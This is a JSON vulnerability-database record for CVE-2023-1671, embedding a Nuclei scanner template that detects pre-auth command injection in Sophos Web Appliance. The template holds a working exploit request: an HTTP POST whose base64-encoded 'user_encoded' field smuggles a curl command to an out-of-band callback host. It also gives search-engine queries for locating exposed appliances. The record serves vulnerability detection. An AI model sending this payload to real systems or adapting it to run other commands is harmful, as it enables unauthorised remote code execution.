{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-1671/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-1671/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-1671/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-1671/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-1671/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-1671"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-1671"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-1671.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-1671\n\ninfo:\n  name: Sophos Web Appliance - Remote Code Execution\n  author: Co5mos\n  severity: critical\n  description: |\n    A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability.\n  reference:\n    - https://vulncheck.com/blog/cve-2023-1671-analysis\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-1671\n    - http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html\n    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce\n    - https://github.com/lions2012/Penetration_Testing_POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-1671\n    cwe-id: CWE-77\n    epss-score: 0.99999\n    epss-percentile: 0.99992\n    cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: sophos\n    product: web_appliance\n    shodan-query:\n      - title:\"Sophos Web Appliance\"\n      - http.title:\"sophos web appliance\"\n      - http.favicon.hash:-893681401\n    fofa-query:\n      - title=\"Sophos Web Appliance\"\n      - title=\"sophos web appliance\"\n      - icon_hash=-893681401\n    google-query: intitle:\"sophos web appliance\"\n  tags: cve2023,cve,packetstorm,rce,sophos,oast,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /index.php?c=blocked&action=continue HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: curl\"\n# digest: 4b0a00483046022100826b4d9c606ecb949602d2008fc90352243b028492ce35c1f5a32e99622b2da902210092571c8622caa02436671f32ae5d467e32df6d8e94038b5233a83f64da5ed0b7:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-1671"
}